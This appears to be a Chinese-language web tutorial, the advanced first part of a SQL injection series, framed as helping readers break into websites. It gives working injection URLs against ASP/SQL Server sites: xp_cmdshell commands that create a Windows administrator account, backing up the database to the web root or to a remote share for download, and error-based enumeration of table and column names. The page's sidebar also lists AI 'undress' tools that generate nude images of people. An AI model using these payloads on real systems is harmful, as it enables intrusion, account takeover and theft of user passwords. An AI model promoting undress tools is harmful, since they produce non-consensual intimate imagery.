search
HomeDatabaseMysql TutorialSQL注入漏洞全接触--高级篇(一)_MySQL

看完入门篇和进阶篇后,稍加练习,破解一般的网站是没问题了。但如果碰到表名列名猜不到,或程序作者过滤了一些特殊字符,怎么提高注入的成功率?怎么样提高猜解效率?请大家接着往下看高级篇。  

  第一节、利用系统表注入SQLServer数据库  

  SQLServer是一个功能强大的数据库系统,与操作系统也有紧密的联系,这给开发者带来了很大的方便,但另一方面,也为注入者提供了一个跳板,我们先来看看几个具体的例子:  

  ① http://Site/url.ASP?id=1;exec master..xp_cmdshell “net user name password /add”--

  分号;在SQLServer中表示隔开前后两句语句,--表示后面的语句为注释,所以,这句语句在SQLServer中将被分成两句执行,先是Select出ID=1的记录,然后执行存储过程xp_cmdshell,这个存储过程用于调用系统命令,于是,用net命令新建了用户名为name、密码为password的windows的帐号,接着:  

  ② http://Site/url.ASP?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--

  将新建的帐号name加入管理员组,不用两分钟,你已经拿到了系统最高权限!当然,这种方法只适用于用sa连接数据库的情况,否则,是没有权限调用xp_cmdshell的。

  ③ http://Site/url.ASP?id=1 ;;and db_name()>0  

  前面有个类似的例子and user>0,作用是获取连接用户名,db_name()是另一个系统变量,返回的是连接的数据库名。  

  ④ http://Site/url.ASP?id=1;backup database 数据库名 to disk=’c:/inetpub/wwwroot/1.db’;--  

  这是相当狠的一招,从③拿到的数据库名,加上某些IIS出错暴露出的绝对路径,将数据库备份到Web目录下面,再用HTTP把整个数据库就完完整整的下载回来,所有的管理员及用户密码都一览无遗!在不知道绝对路径的时候,还可以备份到网络地址的方法(如//202.96.xx.xx/Share/1.db),但成功率不高。

  ⑤ http://Site/url.ASP?id=1 ;;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0  

  前面说过,sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype=’U’ and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。第二、第三个表名怎么获取?还是留给我们聪明的读者思考吧。  

  ⑥ http://Site/url.ASP?id=1 ;;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0 

  从⑤拿到表名后,用object_id(‘表名’)获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。

  以上6点是我研究SQLServer注入半年多以来的心血结晶,可以看出,对SQLServer的了解程度,直接影响着成功率及猜解速度。在我研究SQLServer注入之后,我在开发方面的水平也得到很大的提高,呵呵,也许安全与开发本来就是相辅相成的吧

Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Windows 10企业版2016长期服务版的综合评价如何?Windows 10企业版2016长期服务版的综合评价如何?Jan 15, 2024 pm 03:18 PM

win10里面有非常多的系统可以选择使用,其中win10企业版2016长期服务版就是一个比较好用的系统版本,其中不管是功能还是什么都很不错,如果你日常使用的话这个系统版本可以说是非常优秀的。win10企业版2016长期服务版怎么样答:表现很不错。该产品乃是专门针对企业级客户量身打造,致力于构建出稳定、高效且安全性极高的计算环境。win10企业版2016长期服务版介绍1、保障:Windows2016企业版长期服务诚挚地向用户提供长达五年的充分主流支持以及同等时长的深入扩展支持2、系统经过层层把关的

win10 LTSC版本的评价如何?win10 LTSC版本的评价如何?Dec 25, 2023 pm 04:25 PM

很多小伙伴不确定win10ltsc版本好不好,其实这款版本相较于其他版本还是很不错的,软件非常的干净,可以说没有其他多余的app,所以还是比较不错的。win10ltsc版本怎么样:答:相对来说还是很不错的win10ltsc版本相对来说还是很不错的,内容非常的干净,很适合喜欢干净的小伙伴下载。Win10LTSC版主要优点概述:优势一:此版本剔除了附加应用程序、Edge浏览器以及小娜,充分展现出其精简特性,避免了用户误操作导致不必要的干扰。同时,服务更为简化,运行速度也相应提升。优势二:1、对大部分

一文分析POLYDOGE币未来潜力怎么样?一文分析POLYDOGE币未来潜力怎么样?Jul 15, 2024 pm 05:24 PM

POLYDOGE币的英文全称是PolyDoge,其实这个Polydoge是polygon上的meme社区代币,目前已经发行以Polydoge为主题的NFT,并开始与Netvrk合作开发PlaytoEarn游戏。POLYDOGE是在Polygon网络上诞生的代币,同时它也是该链上的第一个meme硬币,就在几天前它变成了跨链,并且可以在Crypto.com的Cronos网络上找到。有传言称,著名的币安智能链也即将发布。很多投资者都想要知道这个POLYDOGE币未来潜力怎么样?下面就让小编为大家说一说

小米4手机怎么样 最新小米4介绍小米4手机怎么样 最新小米4介绍Mar 24, 2024 pm 01:31 PM

近来国产机越来越强势,发布了各系列旗舰机和性价比超高的“千元机”,就在之前小米发布了小米5C,虽然是小米的初试产品,不过赵志福还是很看好小米的,希望能赶上华为的步伐,好了,进入主题本次的主角-小米4小米手机4搭载高通骁龙801(V3)2.5GHz处理器运行内存和内存为3GBRAM及16/64GBROM,(当时的主流运行内存大部分都保持在1/2GB),小米4弄成3GB的运行内存,在当时这种配置算是给力的了,后置摄像头为1300万的SonyIMX214,800万前置摄像头,屏幕为5英寸1080p这是

win7中的Edge浏览器的表现如何?win7中的Edge浏览器的表现如何?Dec 27, 2023 pm 03:51 PM

edge浏览器是微软全新开发的浏览器,内核与之前的ie浏览器完全不一样,有些用户经过操作,win7系统也能使用edge浏览器,那么具体这款浏览器使用起来怎么样呢,这篇文章就为大家简单讲解一下。win7edge浏览器怎么样答:Edge浏览器还是挺不错的,因为其内核与之前饱受争议的IE浏览器完全不同,更是采用了不同的代码和优化算法,性能方面更为突出优秀。edge浏览器还额外新增了涂鸦模式,用户能直接在浏览器上进行涂鸦。而阅读模式更是方便,不仅支持用户自己设置页面布局,还没有任何的广告,字体背景也都可

EDU币怎么样?还有价值吗?EDU币怎么样?还有价值吗?Jul 11, 2024 pm 05:05 PM

区块链技术运用广泛且已经改变了众多行业构造,但教育领域尚未开发运用,OpenCampus(EDU)正是在这一背景下得以发展,2023年在币安Launchpad上推出EDU币出售后,项目借势强劲发展,扩大了其覆盖范围和影响力,对于投资者来说更关注这EDU币怎么样?有的投资者决定投资该币种前发现在10月份迎来了历史最低0.3748美元,这让投资者担心EDU币还有价值吗?其实根据当前数据来看,EDU币还是不错的,有一定的投资价值,下面小编为大家详细说说。EDU币怎么样?目前来看EDU币表现还不错,根据

如何评价13600kf与技嘉b760的搭配(11700k与技嘉小雕配对)?如何评价13600kf与技嘉b760的搭配(11700k与技嘉小雕配对)?Jan 02, 2024 am 08:35 AM

13600kf搭配技嘉b760怎么样1.搭配效果不错。2.因为13600kf是英特尔的一款高性能处理器,而技嘉b760是一款性能稳定的主板,两者搭配可以充分发挥处理器的性能,提供流畅的计算和游戏体验。3.此外,技嘉b760还具有良好的扩展性和稳定性,可以支持多种硬件设备的连接和运行,为用户提供更多的选择和便利。因此,搭配13600kf和技嘉b760可以满足用户对高性能计算和游戏需求的同时,也具备良好的稳定性和可靠性。搭配13600kf和技嘉b760相对来说是不错的选择。13600kf是一款性价比

win10最新版本1909怎么样win10最新版本1909怎么样Dec 29, 2023 pm 04:57 PM

微软推出了Winowds10之后得到了很多用户的高度关注。那么这个最新推送的版本都更新了什么内容呢?下面就让小编带大家一起来看一看win101909的新功能吧。win10最新版本1909怎么样小编回答:win101909修复了之前版本出现的漏洞BUG,另外增加了一些新的小功能:操作中心的告诉优化、禁用一切告诉的声响、告诉视觉更改等等。小编觉得win10最新版本1909还是很不错的,毕竟win10也是当前的主流系统,大家可以放心安装升级啦~win10操作系统下载地址:>>>台式机雨林木风w

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
Repo: How To Revive Teammates
4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

PhpStorm Mac version

PhpStorm Mac version

The latest (2018.2.1) professional PHP integrated development tool

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

mPDF

mPDF

mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

Safe Exam Browser

Safe Exam Browser

Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.